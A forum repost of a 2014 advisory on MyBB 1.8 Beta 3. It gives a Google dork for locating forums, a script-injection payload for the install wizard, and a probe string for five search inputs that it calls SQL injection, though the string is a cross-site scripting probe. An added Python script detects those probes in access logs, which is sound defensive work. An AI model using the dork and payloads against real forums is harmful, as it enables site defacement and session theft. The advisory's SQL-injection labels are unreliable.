MyBB 1.8 Beta 3 - CSS & SQL Injection Vulnerability

23-12-2014 13:17
#1
serverbedi (Member)



# Title: MyBB 1.8 Beta 3 - Cross Site Scripting & SQL Injection
# Google Dork: intext:"Powered By MyBB"
# Date: 15.08.2014
# Author: DemoLisH
# Vendor Homepage: MyBB - Free and Open Source Forum Software
# Software Link: Redirecting
# Version: 1.8 - Beta 3
# Contact: onur@b3yaz.org
***************************************************
a) Cross Site Scripting in Installation Wizard ( Board Configuration )
Fill -Forum Name, Website Name, Website URL- with your code, for example - ">**********alert('DemoLisH')</script>
localhost/install/index.php
Now let's finish setup and go to the homepage.


b) SQL Injection in Private Messages ( User CP )
Go to -> Inbox, for example: localhost/private.php
Search at the following code Keywords: <foo> <h1> ********** alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload


c) SQL Injection in Showthread
Go to -> Show Thread, for example: localhost/showthread.php?tid=1
Search at the following code Keywords: <foo> <h1> ********** alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload


d) SQL Injection in Search
Go to -> Search, for example: localhost/search.php
Search at the following code Keywords: <foo> <h1> ********** alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload


e) SQL Injection in Help ********s
Go to -> Help ********s, for example: localhost/misc.php?action=help
Search at the following code Keywords: <foo> <h1> ********** alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload


f) SQL Injection in Forum Display
Go to -> Forum Display, for example: localhost/forumdisplay.php?fid=2
Search at the following code "Search this Forum": <foo> <h1> ********** alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload


Source: MyBB 1.8 Beta 3 - Multiple Vulnerabilities
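As an added defensive example (not part of the advisory, of this post, or of MyBB), the following Python scans web-server access log lines for requests to the endpoints listed above whose query parameters contain the advisory's probe keywords, which is what a forum operator would look for when checking whether those inputs have been probed. The combined log format, the sample log lines and all function names are assumptions.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Added detection example (not from the advisory or MyBB): flag requests to the
# endpoints the advisory lists whose query parameters carry its probe tokens.
WATCHED_PATHS = {"/install/index.php", "/private.php", "/showthread.php",
                 "/search.php", "/misc.php", "/forumdisplay.php"}

# Probe tokens from the advisory's keyword string, matched against both the raw
# and the URL-decoded value so "%42" is caught raw and "<foo>" after decoding.
PROBE_RE = re.compile(
    r"<foo>|<h1>|</?script|alert\s*\(|prompt|\\x41|%42|constructor|onload",
    re.IGNORECASE)
# Combined log format (assumed): client ident user [time] "request" status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample lines using RFC 5737 documentation addresses.
SAMPLE_LOG = """\
203.0.113.5 - - [23/Dec/2014:13:17:01 +0200] "GET /search.php?keywords=%3Cfoo%3E+%3Ch1%3E+alert%28bar%29+onload HTTP/1.1" 200 5120
203.0.113.5 - - [23/Dec/2014:13:17:05 +0200] "GET /forumdisplay.php?fid=2 HTTP/1.1" 200 8192
198.51.100.7 - - [23/Dec/2014:13:18:00 +0200] "GET /showthread.php?tid=1&keywords=prompt+constructor+%5Cx41 HTTP/1.1" 200 7000
198.51.100.7 - - [23/Dec/2014:13:18:20 +0200] "GET /misc.php?action=help HTTP/1.1" 200 3000
"""

def probe_tokens(value):
    """Sorted probe tokens found in one parameter value, raw and URL-decoded."""
    found = set()
    for text in (value, unquote_plus(value)):
        found |= {re.sub(r"\s+", "", m).lower() for m in PROBE_RE.findall(text)}
    return sorted(found)

def scan_log(text):
    """One hit per (request, parameter) carrying at least one probe token."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, when, _method, target, _status = m.groups()
        parts = urlsplit(target)
        if parts.path not in WATCHED_PATHS:
            continue
        for pair in parts.query.split("&"):
            name, _, raw = pair.partition("=")  # keep the raw value for decoding
            tokens = probe_tokens(raw)
            if tokens:
                hits.append({"client": client, "time": when, "path": parts.path,
                             "param": name, "tokens": tokens})
    return hits
```

Running `scan_log(SAMPLE_LOG)` reports the two probing requests and ignores the two ordinary ones; feed it the real access log to see which of the listed endpoints received such input and from where.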

